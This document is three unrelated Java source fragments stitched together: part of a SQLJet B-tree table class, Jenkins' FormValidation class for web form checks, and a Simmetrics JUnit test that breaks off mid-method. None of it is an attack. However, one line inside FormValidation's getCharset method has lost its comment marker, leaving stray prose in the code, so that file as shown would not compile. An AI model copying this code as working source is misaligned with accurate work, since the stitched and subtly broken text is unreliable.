* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getFieldsCount
* ()
*/
public int getFieldsCount() throws SqlJetException {
final ISqlJetBtreeRecord r = getRecord();
if (null == r)
return 0;
return r.getFieldsCount();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#isNull(int)
*/
public boolean isNull(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (null == value)
return true;
return value.isNull();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getString(int)
*/
public String getString(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return null;
return SqlJetUtility.toString(value.valueText(getEncoding()), getEncoding());
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getInteger
* (int)
*/
public long getInteger(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return 0;
return value.intValue();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getReal(int)
*/
public double getFloat(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return 0;
return value.realValue();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getFieldType
* (int)
*/
public SqlJetValueType getFieldType(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null)
return SqlJetValueType.NULL;
return value.getType();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getBlob(int)
*/
public ISqlJetMemoryPointer getBlob(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return null;
return value.valueBlob();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getValues()
*/
public Object[] getValues() throws SqlJetException {
if (valuesCache != null) {
return valuesCache;
} else {
final ISqlJetBtreeRecord record = getRecord();
final int fieldsCount = record.getFieldsCount();
for (int i = 0; i < fieldsCount; i++) {
valueCache[i] = getValue(i);
}
valuesCache = valueCache;
return valueCache;
}
}
public long newRowId() throws SqlJetException {
return newRowId(0);
}
/**
     * Get a new integer record number (a.k.a. "rowid") to be used as the key
     * of a table. The record number has not previously been used as a key in
     * the database table that this cursor points to; the new record number is
     * returned to the caller.
*
* Prev is the largest previously generated record number. No new record
* numbers are allowed to be less than this value. When this value reaches
* its maximum, a SQLITE_FULL error is generated. This mechanism is used to
* help implement the AUTOINCREMENT feature.
*
* @param prev
* @return
* @throws SqlJetException
*/
public long newRowId(long prev) throws SqlJetException {
/*
* The next rowid or record number (different terms for the same thing)
* is obtained in a two-step algorithm. First we attempt to find the
* largest existing rowid and add one to that. But if the largest
* existing rowid is already the maximum positive integer, we have to
* fall through to the second probabilistic algorithm. The second
* algorithm is to select a rowid at random and see if it already exists
* in the table. If it does not exist, we have succeeded. If the random
         * rowid does exist, we select a new one and try again, up to 100
         * times. For a table with less than 2 billion entries, the probability
         * of not finding an unused rowid is about 1.0e-300. This is a non-zero
* probability, but it is still vanishingly small and should never cause
* a problem. You are much, much more likely to have a hardware failure
* than for this algorithm to fail.
*
* To promote locality of reference for repetitive inserts, the first
* few attempts at choosing a random rowid pick values just a little
* larger than the previous rowid. This has been shown experimentally to
* double the speed of the COPY operation.
*/
lock();
try {
boolean useRandomRowid = false;
long v = 0;
int res = 0;
int cnt = 0;
if ((getCursor().flags() & (SqlJetBtreeTableCreateFlags.INTKEY.getValue() | SqlJetBtreeTableCreateFlags.ZERODATA
.getValue())) != SqlJetBtreeTableCreateFlags.INTKEY.getValue()) {
throw new SqlJetException(SqlJetErrorCode.CORRUPT);
}
assert ((getCursor().flags() & SqlJetBtreeTableCreateFlags.INTKEY.getValue()) != 0);
assert ((getCursor().flags() & SqlJetBtreeTableCreateFlags.ZERODATA.getValue()) == 0);
long MAX_ROWID = 0x7fffffff;
final boolean last = getCursor().last();
if (last) {
v = 1;
} else {
v = getCursor().getKeySize();
if (v == MAX_ROWID) {
useRandomRowid = true;
} else {
v++;
}
if (prev != 0) {
if (prev == MAX_ROWID || useRandomRowid) {
throw new SqlJetException(SqlJetErrorCode.FULL);
}
if (v < prev) {
v = prev + 1;
}
}
if (useRandomRowid) {
v = priorNewRowid;
Random random = new Random();
/* SQLITE_FULL must have occurred prior to this */
assert (prev == 0);
cnt = 0;
do {
if (cnt == 0 && (v & 0xffffff) == v) {
v++;
} else {
v = random.nextInt();
if (cnt < 5)
v &= 0xffffff;
}
if (v == 0)
continue;
res = getCursor().moveToUnpacked(null, v, false);
cnt++;
} while (cnt < 100 && res == 0);
priorNewRowid = v;
if (res == 0) {
throw new SqlJetException(SqlJetErrorCode.FULL);
}
}
}
return v;
} finally {
unlock();
}
}
protected void clearRecordCache() {
recordCache = null;
valuesCache = null;
valueCache = null;
}
public void clear() throws SqlJetException {
btree.clearTable(rootPage, null);
}
public long getKeySize() throws SqlJetException {
return getCursor().getKeySize();
}
public int moveTo(ISqlJetMemoryPointer pKey, long nKey, boolean bias) throws SqlJetException {
clearRecordCache();
return getCursor().moveTo(pKey, nKey, bias);
}
/**
* @param object
* @param rowId
* @param pData
* @param remaining
* @param i
* @param b
* @throws SqlJetException
*/
public void insert(ISqlJetMemoryPointer pKey, long nKey, ISqlJetMemoryPointer pData, int nData, int nZero,
boolean bias) throws SqlJetException {
clearRecordCache();
getCursor().insert(pKey, nKey, pData, nData, nZero, bias);
}
/**
* @throws SqlJetException
*
*/
public void delete() throws SqlJetException {
clearRecordCache();
getCursor().delete();
}
}
|
|
/*
* The MIT License
*
* Copyright (c) 2004-2009, Sun Microsystems, Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package hudson.util;
import hudson.EnvVars;
import hudson.Functions;
import hudson.Launcher;
import hudson.ProxyConfiguration;
import hudson.RelativePath;
import hudson.Util;
import hudson.FilePath;
import hudson.model.AbstractBuild;
import hudson.model.BuildListener;
import hudson.model.Descriptor;
import hudson.tasks.Builder;
import hudson.util.ReflectionUtils.Parameter;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.HttpResponse;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.StaplerRequest;
import org.kohsuke.stapler.StaplerResponse;
import org.kohsuke.stapler.Stapler;
import org.springframework.util.StringUtils;
import javax.annotation.Nonnull;
import javax.servlet.ServletException;
import java.io.File;
import java.io.IOException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLConnection;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import java.util.Locale;
import static hudson.Functions.jsStringEscape;
import static hudson.Util.*;
/**
* Represents the result of the form field validation.
*
* <p>
* Use one of the factory methods to create an instance, then return it from your <tt>doCheckXyz</tt>
* method. (Via {@link HttpResponse}, the returned object will render the result into {@link StaplerResponse}.)
* This way of designing form field validation allows you to reuse {@code doCheckXyz()} methods
* programmatically as well (by using {@link #kind}).
*
* <p>
* For typical validation needs, this class offers a number of {@code validateXXX(...)} methods, such as
* {@link #validateExecutable(String)}. {@link FilePath} also has a number of {@code validateXXX(...)} methods
* that you may be able to reuse.
*
* <p>
* Also see <tt>doCheckCvsRoot</tt> in <tt>CVSSCM</tt> as an example.
*
* <p>
* This class extends {@link IOException} so that it can be thrown from a method. This allows one to reuse
* the checking logic as a part of the real computation, such as:
*
* <pre>
* String getAntVersion(File antHome) throws FormValidation {
* if(!antHome.isDirectory())
* throw FormValidation.error(antHome+" doesn't look like a home directory");
* ...
* return IOUtils.toString(new File(antHome,"version"));
* }
*
* ...
*
* public FormValidation doCheckAntVersion(@QueryParameter String f) {
* try {
* return ok(getAntVersion(new File(f)));
* } catch (FormValidation f) {
* return f;
* }
* }
*
* ...
*
* public void {@linkplain Builder#perform(AbstractBuild, Launcher, BuildListener) perform}(...) {
* String version = getAntVersion(antHome);
* ...
* }
* </pre>
*
* @author Kohsuke Kawaguchi
* @since 1.294
*/
public abstract class FormValidation extends IOException implements HttpResponse {
/**
* Indicates the kind of result.
*/
public enum Kind {
/**
* Form field value was OK and no problem was detected.
*/
OK,
/**
* Form field value contained something suspicious. For some limited use cases
* the value could be valid, but we suspect the user made a mistake.
*/
WARNING,
/**
* Form field value contained a problem that should be corrected.
*/
ERROR
}
/**
* Sends out a string error message that indicates an error.
*
* @param message
* Human readable message to be sent. <tt>error(null)</tt>
* can be used as <tt>ok()</tt>.
*/
public static FormValidation error(String message) {
return errorWithMarkup(message==null?null: Util.escape(message));
}
public static FormValidation warning(String message) {
return warningWithMarkup(message==null?null:Util.escape(message));
}
public static FormValidation ok(String message) {
return okWithMarkup(message==null?null:Util.escape(message));
}
/**
* Singleton instance that represents "OK".
*/
private static final FormValidation OK = respond(Kind.OK,"<div/>");
public static FormValidation ok() {
return OK;
}
/**
* Sends out a string error message that indicates an error,
* by formatting it with {@link String#format(String, Object[])}
*/
public static FormValidation error(String format, Object... args) {
return error(String.format(format,args));
}
public static FormValidation warning(String format, Object... args) {
return warning(String.format(format,args));
}
public static FormValidation ok(String format, Object... args) {
return ok(String.format(format,args));
}
/**
* Sends out a string error message, with optional "show details" link that expands to the full stack trace.
*
* <p>
* Use this with caution, so that anonymous users do not gain too much insight into the state of the system,
* as an error stack trace often reveals a lot of information. Consider whether a check operation needs to be exposed
* to everyone or just to those who have higher access to the job/hudson/etc.
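* <p>
* For example (illustrative; the probe is whatever check you are performing):
* <pre>
* try {
*     // ... probe the resource being validated ...
*     return FormValidation.ok();
* } catch (IOException e) {
*     return FormValidation.error(e, "Failed to reach the server");
* }
* </pre>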
*/
public static FormValidation error(Throwable e, String message) {
return _error(Kind.ERROR, e, message);
}
public static FormValidation warning(Throwable e, String message) {
return _error(Kind.WARNING, e, message);
}
private static FormValidation _error(Kind kind, Throwable e, String message) {
if (e==null) return _errorWithMarkup(Util.escape(message),kind);
return _errorWithMarkup(Util.escape(message)+
" <a href='#' class='showDetails'>"
+ Messages.FormValidation_Error_Details()
+ "</a><pre style='display:none'>"
+ Functions.printThrowable(e) +
"</pre>",kind
);
}
public static FormValidation error(Throwable e, String format, Object... args) {
return error(e,String.format(format,args));
}
public static FormValidation warning(Throwable e, String format, Object... args) {
return warning(e,String.format(format,args));
}
/**
* Aggregate multiple validations into one.
*
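* An illustrative use (the field names are hypothetical):
*
* <pre>
* return FormValidation.aggregate(Arrays.asList(
*         FormValidation.validateRequired(name),
*         FormValidation.validateNonNegativeInteger(retryCount)));
* </pre>
*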
* @return Validation of the least successful kind aggregating all child messages.
* @since TODO
*/
public static @Nonnull FormValidation aggregate(@Nonnull Collection<FormValidation> validations) {
if (validations == null || validations.isEmpty()) return FormValidation.ok();
if (validations.size() == 1) return validations.iterator().next();
final StringBuilder sb = new StringBuilder("<ul style='list-style-type: none; padding-left: 0; margin: 0'>");
FormValidation.Kind worst = Kind.OK;
for (FormValidation validation: validations) {
sb.append("<li>").append(validation.renderHtml()).append("</li>");
if (validation.kind.ordinal() > worst.ordinal()) {
worst = validation.kind;
}
}
sb.append("</ul>");
return respond(worst, sb.toString());
}
/**
* Sends out an HTML fragment that indicates an error.
*
* <p>
* This method must be used with care to avoid cross-site scripting
* attack.
*
* @param message
* Human readable message to be sent. <tt>error(null)</tt>
* can be used as <tt>ok()</tt>.
*/
public static FormValidation errorWithMarkup(String message) {
return _errorWithMarkup(message,Kind.ERROR);
}
public static FormValidation warningWithMarkup(String message) {
return _errorWithMarkup(message,Kind.WARNING);
}
public static FormValidation okWithMarkup(String message) {
return _errorWithMarkup(message,Kind.OK);
}
private static FormValidation _errorWithMarkup(final String message, final Kind kind) {
if(message==null)
return ok();
return new FormValidation(kind, message) {
public String renderHtml() {
StaplerRequest req = Stapler.getCurrentRequest();
if (req == null) { // being called from some other context
return message;
}
// 1x16 spacer needed for IE since it doesn't support min-height
return "<div class="+ kind.name().toLowerCase(Locale.ENGLISH) +"><img src='"+
req.getContextPath()+ Jenkins.RESOURCE_PATH+"/images/none.gif' height=16 width=1>"+
message+"</div>";
}
@Override public String toString() {
return kind + ": " + message;
}
};
}
/**
* Sends out an arbitrary HTML fragment as the output.
*/
public static FormValidation respond(Kind kind, final String html) {
return new FormValidation(kind) {
public String renderHtml() {
return html;
}
@Override public String toString() {
return kind + ": " + html;
}
};
}
/**
* Performs an application-specific validation on the given file.
*
* <p>
* This is used as a piece in a bigger validation effort.
*/
public static abstract class FileValidator {
public abstract FormValidation validate(File f);
/**
* Singleton instance that does no check.
*/
public static final FileValidator NOOP = new FileValidator() {
public FormValidation validate(File f) {
return ok();
}
};
}
/**
* Makes sure that the given string points to an executable file.
*/
public static FormValidation validateExecutable(String exe) {
return validateExecutable(exe, FileValidator.NOOP);
}
/**
* Makes sure that the given string points to an executable file.
*
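* <p>
* A sketch of how an additional check can be attached (the version probe is
* illustrative, not a prescribed pattern):
*
* <pre>
* return FormValidation.validateExecutable(exe, new FileValidator() {
*     public FormValidation validate(File f) {
*         // e.g. run the executable with a version flag and inspect the output
*         return ok();
*     }
* });
* </pre>
*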
* @param exeValidator
* If the validation process discovers a valid executable program on the given path,
* the specified {@link FileValidator} can perform additional checks (such as making sure
* that it has the right version, etc.)
*/
public static FormValidation validateExecutable(String exe, FileValidator exeValidator) {
// insufficient permission to perform validation?
if(!Jenkins.getInstance().hasPermission(Jenkins.ADMINISTER)) return ok();
exe = fixEmpty(exe);
if(exe==null)
return ok();
if(exe.indexOf(File.separatorChar)>=0) {
// this is full path
File f = new File(exe);
if(f.exists()) return exeValidator.validate(f);
File fexe = new File(exe+".exe");
if(fexe.exists()) return exeValidator.validate(fexe);
return error("There's no such file: "+exe);
}
// look in PATH
String path = EnvVars.masterEnvVars.get("PATH");
String tokenizedPath = "";
String delimiter = null;
if(path!=null) {
for (String _dir : Util.tokenize(path.replace("\\", "\\\\"),File.pathSeparator)) {
if (delimiter == null) {
delimiter = ", ";
}
else {
tokenizedPath += delimiter;
}
tokenizedPath += _dir.replace('\\', '/');
File dir = new File(_dir);
File f = new File(dir,exe);
if(f.exists()) return exeValidator.validate(f);
File fexe = new File(dir,exe+".exe");
if(fexe.exists()) return exeValidator.validate(fexe);
}
tokenizedPath += ".";
} else {
tokenizedPath = "unavailable.";
}
// didn't find it
return error("There's no such executable "+exe+" in PATH: "+tokenizedPath);
}
/**
* Makes sure that the given string is a non-negative integer.
*/
public static FormValidation validateNonNegativeInteger(String value) {
try {
if(Integer.parseInt(value)<0)
return error(hudson.model.Messages.Hudson_NotANonNegativeNumber());
return ok();
} catch (NumberFormatException e) {
return error(hudson.model.Messages.Hudson_NotANumber());
}
}
/**
* Makes sure that the given string is a positive integer.
*/
public static FormValidation validatePositiveInteger(String value) {
try {
if(Integer.parseInt(value)<=0)
return error(hudson.model.Messages.Hudson_NotAPositiveNumber());
return ok();
} catch (NumberFormatException e) {
return error(hudson.model.Messages.Hudson_NotANumber());
}
}
/**
* Makes sure that the given string is not null or empty.
*/
public static FormValidation validateRequired(String value) {
if (Util.fixEmptyAndTrim(value) == null)
return error(Messages.FormValidation_ValidateRequired());
return ok();
}
/**
* Makes sure that the given string is a base64 encoded text.
*
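* <p>
* For example (the error message is illustrative):
* <pre>
* return FormValidation.validateBase64(value, false, true, "Not a valid Base64 string");
* </pre>
*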
* @param allowWhitespace
* if you allow whitespace (CR,LF,etc) in base64 encoding
* @param allowEmpty
* Is empty string allowed?
* @param errorMessage
* Error message.
* @since 1.305
*/
public static FormValidation validateBase64(String value, boolean allowWhitespace, boolean allowEmpty, String errorMessage) {
try {
String v = value;
if(!allowWhitespace) {
if(v.indexOf(' ')>=0 || v.indexOf('\n')>=0)
return error(errorMessage);
}
v=v.trim();
if(!allowEmpty && v.length()==0)
return error(errorMessage);
com.trilead.ssh2.crypto.Base64.decode(v.toCharArray());
return ok();
} catch (IOException e) {
return error(errorMessage);
}
}
/**
* Convenient base class for checking the validity of URLs.
*
* <p>
* This allows the check method to call various utility methods in a concise syntax.
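* <p>
* A typical subclass looks roughly like this (the URL and marker text are
* illustrative):
*
* <pre>
* new URLCheck() {
*     protected FormValidation check() throws IOException, ServletException {
*         String url = "http://www.example.com/";
*         try {
*             if (findText(open(new URL(url)), "expected marker"))
*                 return FormValidation.ok();
*             return FormValidation.error("This does not look like the right page");
*         } catch (IOException e) {
*             return handleIOException(url, e);
*         }
*     }
* }.check();
* </pre>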
*/
public static abstract class URLCheck {
/**
* Opens the given URL and reads text content from it.
* This method honors the Content-Type header.
*/
protected BufferedReader open(URL url) throws IOException {
// use HTTP content type to find out the charset.
URLConnection con = ProxyConfiguration.open(url);
if (con == null) { // TODO is this even permitted by URL.openConnection?
throw new IOException(url.toExternalForm());
}
return new BufferedReader(
new InputStreamReader(con.getInputStream(),getCharset(con)));
}
/**
* Finds the string literal from the given reader.
* @return
* true if found, false otherwise.
*/
protected boolean findText(BufferedReader in, String literal) throws IOException {
String line;
while((line=in.readLine())!=null)
if(line.indexOf(literal)!=-1)
return true;
return false;
}
/**
* Calls the {@link FormValidation#error(String)} method with a reasonable error message.
* Use this method when the {@link #open(URL)} or {@link #findText(BufferedReader, String)} fails.
*
* @param url
* Pass in the URL that was connected. Used for error diagnosis.
*/
protected FormValidation handleIOException(String url, IOException e) throws IOException, ServletException {
// any invalid URL comes here
if(e.getMessage().equals(url))
// Sun JRE (and probably others too) often return just the URL in the error.
return error("Unable to connect "+url);
else
return error(e.getMessage());
}
/**
* Figures out the charset from the content-type header.
*/
private String getCharset(URLConnection con) {
for( String t : con.getContentType().split(";") ) {
t = t.trim().toLowerCase(Locale.ENGLISH);
if(t.startsWith("charset="))
return t.substring(8);
}
// couldn't find it. HTML spec says default is US-ASCII,
// but UTF-8 is a better choice since
// (1) it's compatible with US-ASCII
* (2) well-written web applications tend to use UTF-8
return "UTF-8";
}
/**
* Implement the actual form validation logic, using the other convenience methods defined in this class.
* If you are not using any of those, you don't need to extend from this class.
*/
protected abstract FormValidation check() throws IOException, ServletException;
}
public final Kind kind;
/**
* Instances should be created via one of the factory methods above.
* @param kind
*/
private FormValidation(Kind kind) {
this.kind = kind;
}
private FormValidation(Kind kind, String message) {
super(message);
this.kind = kind;
}
public void generateResponse(StaplerRequest req, StaplerResponse rsp, Object node) throws IOException, ServletException {
respond(rsp, renderHtml());
}
public abstract String renderHtml();
/**
* Sends out an arbitrary HTML fragment as the output.
*/
protected void respond(StaplerResponse rsp, String html) throws IOException, ServletException {
rsp.setContentType("text/html;charset=UTF-8");
rsp.getWriter().print(html);
}
/**
* Builds up the check URL for the client-side JavaScript to call back.
*/
public static class CheckMethod {
private final Descriptor descriptor;
private final Method method;
private final String capitalizedFieldName;
/**
* Names of the parameters to pass from the client.
*/
private final List<String> names;
private volatile String checkUrl; // cached once computed
private volatile String dependsOn; // cached once computed
public CheckMethod(Descriptor descriptor, String fieldName) {
this.descriptor = descriptor;
this.capitalizedFieldName = StringUtils.capitalize(fieldName);
method = ReflectionUtils.getPublicMethodNamed(descriptor.getClass(), "doCheck" + capitalizedFieldName);
if(method !=null) {
names = new ArrayList<String>();
findParameters(method);
} else {
names = null;
}
}
/**
* Builds the query parameter line by figuring out what should be submitted.
*/
private void findParameters(Method method) {
for (Parameter p : ReflectionUtils.getParameters(method)) {
QueryParameter qp = p.annotation(QueryParameter.class);
if (qp!=null) {
String name = qp.value();
if (name.length()==0) name = p.name();
if (name==null || name.length()==0)
continue; // unknown parameter name. we'll report the error when the form is submitted.
if (name.equals("value"))
continue; // 'value' parameter is implicit
RelativePath rp = p.annotation(RelativePath.class);
if (rp!=null)
name = rp.value()+'/'+name;
names.add(name);
continue;
}
Method m = ReflectionUtils.getPublicMethodNamed(p.type(), "fromStapler");
if (m!=null) findParameters(m);
}
}
/**
* Obtains the 1.526-compatible single string representation.
*
* This method computes a JavaScript expression that evaluates to the URL to which the client should send
* the validation request.
* A modern version depends on {@link #toStemUrl()} and {@link #getDependsOn()}.
*/
public String toCheckUrl() {
if (names==null) return null;
if (checkUrl==null) {
StringBuilder buf = new StringBuilder(singleQuote(relativePath()));
if (!names.isEmpty()) {
buf.append("+qs(this).addThis()");
for (String name : names) {
buf.append(".nearBy('"+name+"')");
}
buf.append(".toString()");
}
checkUrl = buf.toString();
}
// put this under the right contextual umbrella.
// 'a' in getCurrentDescriptorByNameUrl is always non-null because we already have Hudson as the sentinel
return '\'' + jsStringEscape(Descriptor.getCurrentDescriptorByNameUrl()) + "/'+" + checkUrl;
}
/**
* Returns the URL that the JavaScript should hit to perform form validation, except
* the query string portion (which is built on the client side.)
*/
public String toStemUrl() {
if (names==null) return null;
return jsStringEscape(Descriptor.getCurrentDescriptorByNameUrl()) + '/' + relativePath();
}
public String getDependsOn() {
if (names==null) return null;
if (dependsOn==null)
dependsOn = join(names," ");
return dependsOn;
}
private String relativePath() {
return descriptor.getDescriptorUrl() + "/check" + capitalizedFieldName;
}
}
}
|
|
/*-
* #%L
* Simmetrics - Core
* %%
* Copyright (C) 2014 - 2021 Simmetrics Authors
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package com.github.mpkorstanje.simmetrics.builders;
import com.github.mpkorstanje.simmetrics.simplifiers.SimplifiersMatcher;
import com.google.common.collect.Multiset;
import org.junit.jupiter.api.Test;
import com.github.mpkorstanje.simmetrics.Metric;
import com.github.mpkorstanje.simmetrics.StringMetric;
import com.github.mpkorstanje.simmetrics.StringMetricTest;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForList;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForListWithSimplifier;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForMultiset;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForMultisetWithSimplifier;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForSet;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForSetWithSimplifier;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForString;
import com.github.mpkorstanje.simmetrics.builders.StringMetrics.ForStringWithSimplifier;
import com.github.mpkorstanje.simmetrics.metrics.Identity;
import com.github.mpkorstanje.simmetrics.simplifiers.Simplifier;
import com.github.mpkorstanje.simmetrics.simplifiers.Simplifiers;
import com.github.mpkorstanje.simmetrics.tokenizers.Tokenizer;
import com.github.mpkorstanje.simmetrics.tokenizers.Tokenizers;
import java.util.List;
import java.util.Set;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertSame;
import static org.hamcrest.MatcherAssert.assertThat;
import static com.github.mpkorstanje.simmetrics.simplifiers.Simplifiers.toLowerCase;
import static com.github.mpkorstanje.simmetrics.tokenizers.Tokenizers.whitespace;
final class StringMetricsTest {
public static class Create {
private final Metric<String> metric = new Identity<>();
private final Metric<List<String>> listMetric = new Identity<>();
private final Metric<Set<String>> setMetric = new Identity<>();
private final Simplifier simplifier = Simplifiers.toLowerCase();
private final Simplifier simplifier2 = Simplifiers.removeNonWord();
private final Tokenizer tokenizer = Tokenizers.whitespace();
@Test
void shouldReturnSame() {
StringMetric s = new ForString(metric);
assertSame(s, StringMetrics.create(s));
}
@Test
void shouldReturnForString() {
StringMetric wrapped = StringMetrics.create(metric);
assertEquals(ForString.class, wrapped.getClass());
ForString forString = (ForString) wrapped;
assertSame(metric, forString.getMetric());
}
@Test
void shouldReturnForStringWithSimplifier() {
ForString forString = new ForString(metric);
StringMetric wrapped = StringMetrics.create(forString, simplifier);
assertEquals(ForStringWithSimplifier.class, wrapped.getClass());
ForStringWithSimplifier fsws = (ForStringWithSimplifier) wrapped;
assertSame(metric, fsws.getMetric());
assertSame(simplifier, fsws.getSimplifier());
}
@Test
void shouldReturnForStringWithChainedSimplifiers() {
ForStringWithSimplifier forString = new ForStringWithSimplifier(metric, simplifier);
StringMetric wrapped = StringMetrics.create(forString, simplifier2);
assertEquals(ForStringWithSimplifier.class, wrapped.getClass());
ForStringWithSimplifier fsws = (ForStringWithSimplifier) wrapped;
assertSame(metric, fsws.getMetric());
}
@Test
void shouldReturnForListWithSimplifier() {
ForList forList = new ForList(listMetric, tokenizer);
StringMetric wrapped = StringMetrics.create(forList, simplifier);
assertEquals(ForListWithSimplifier.class, wrapped.getClass());
ForListWithSimplifier flws = (ForListWithSimplifier) wrapped;
assertSame(listMetric, flws.getMetric());
assertEquals(simplifier, flws.getSimplifier());
assertSame(tokenizer, flws.getTokenizer());
}
@Test
void shouldReturnForListWithChainedSimplifiers() {
ForListWithSimplifier forList = new ForListWithSimplifier(listMetric, simplifier, tokenizer);
StringMetric wrapped = StringMetrics.create(forList, simplifier2);
assertEquals(ForListWithSimplifier.class, wrapped.getClass());
ForListWithSimplifier flws = (ForListWithSimplifier) wrapped;
assertSame(listMetric, flws.getMetric());
assertThat(flws.getSimplifier(), SimplifiersMatcher.chain(simplifier2, simplifier));
assertSame(tokenizer, flws.getTokenizer());
}
@Test
void shouldReturnForSetWithSimplifier() {
ForSet forSet = new ForSet(setMetric, tokenizer);
StringMetric wrapped = StringMetrics.create(forSet, simplifier);
assertEquals(ForSetWithSimplifier.class, wrapped.getClass());
ForSetWithSimplifier fsws = (ForSetWithSimplifier) wrapped;
assertSame(setMetric, fsws.getMetric());
assertSame(simplifier, fsws.getSimplifier());
assertSame(tokenizer, fsws.getTokenizer());
}
@Test
void shouldReturnForSetWithChainedSimplifiers() {
ForSetWithSimplifier forSet = new ForSetWithSimplifier(setMetric, simplifier, tokenizer);
StringMetric wrapped = StringMetrics.create(forSet, simplifier2);
assertEquals(ForSetWithSimplifier.class, wrapped.getClass());
ForSetWithSimplifier fsws = (ForSetWithSimplifier) wrapped;
assertSame(setMetric, fsws.getMetric());
assertThat(fsws.getSimplifier(), SimplifiersMatcher.chain(simplifier2, simplifier));
assertSame(tokenizer, fsws.getTokenizer());
}
}
public static class CreateForList {
private Metric<List<String>> metric = new Identity<>();
private Tokenizer tokenizer = Tokenizers.whitespace();
private Simplifier simplifier = Simplifiers.toLowerCase();
@Test
void shouldReturnForList() {
StringMetric wrapped = StringMetrics.createForListMetric(metric, tokenizer);
assertEquals(ForList.class, wrapped.getClass());
ForList forList = (ForList) wrapped;
assertSame(metric, forList.getMetric());
assertSame(tokenizer, forList.getTokenizer());
}
@Test
void shouldReturnForListWithSimplifier() {
StringMetric wrapped = StringMetrics.createForListMetric(metric, simplifier, tokenizer);
assertEquals(ForListWithSimplifier.class, wrapped.getClass());
ForListWithSimplifier forList = (ForListWithSimplifier) wrapped;
assertSame(metric, forList.getMetric());
assertSame(tokenizer, forList.getTokenizer());
assertSame(simplifier, forList.getSimplifier());
}
}
public static class CreateForSet {
private Metric<Set<String>> metric = new Identity<>();
private Tokenizer tokenizer = Tokenizers.whitespace();
private Simplifier simplifier = Simplifiers.toLowerCase();
@Test
void shouldReturnForSet() {
StringMetric wrapped = StringMetrics.createForSetMetric(metric, tokenizer);
assertEquals(ForSet.class, wrapped.getClass());
ForSet forSet = (ForSet) wrapped;
assertSame(metric, forSet.getMetric());
assertSame(tokenizer, forSet.getTokenizer());
}
@Test
void shouldReturnForSetWithSimplifier() {
StringMetric wrapped = StringMetrics.createForSetMetric(metric, simplifier, tokenizer);
assertEquals(ForSetWithSimplifier.class, wrapped.getClass());
ForSetWithSimplifier forSet = (ForSetWithSimplifier) wrapped;
assertSame(metric, forSet.getMetric());
assertSame(tokenizer, forSet.getTokenizer());
assertSame(simplifier, forSet.getSimplifier());
}
}
public static class CreateForMultiset {
private Metric<Multiset<String>> metric = new Identity<>();
private Tokenizer tokenizer = Tokenizers.whitespace();
private Simplifier simplifier = Simplifiers.toLowerCase();
@Test
void shouldReturnForSet() {
StringMetric wrapped = StringMetrics.createForMultisetMetric(metric, tokenizer);
assertEquals(ForMultiset.class, wrapped.getClass());
ForMultiset forSet = (ForMultiset) wrapped;
assertSame(metric, forSet.getMetric());
assertSame(tokenizer, forSet.getTokenizer());
}
@Test
void shouldReturnForSetWithSimplifier() {
StringMetric wrapped = StringMetrics.createForMultisetMetric(metric, simplifier, tokenizer);
assertEquals(ForMultisetWithSimplifier.class, wrapped.getClass());
ForMultisetWithSimplifier forSet = (ForMultisetWithSimplifier) wrapped;
assertSame(metric, forSet.getMetric());
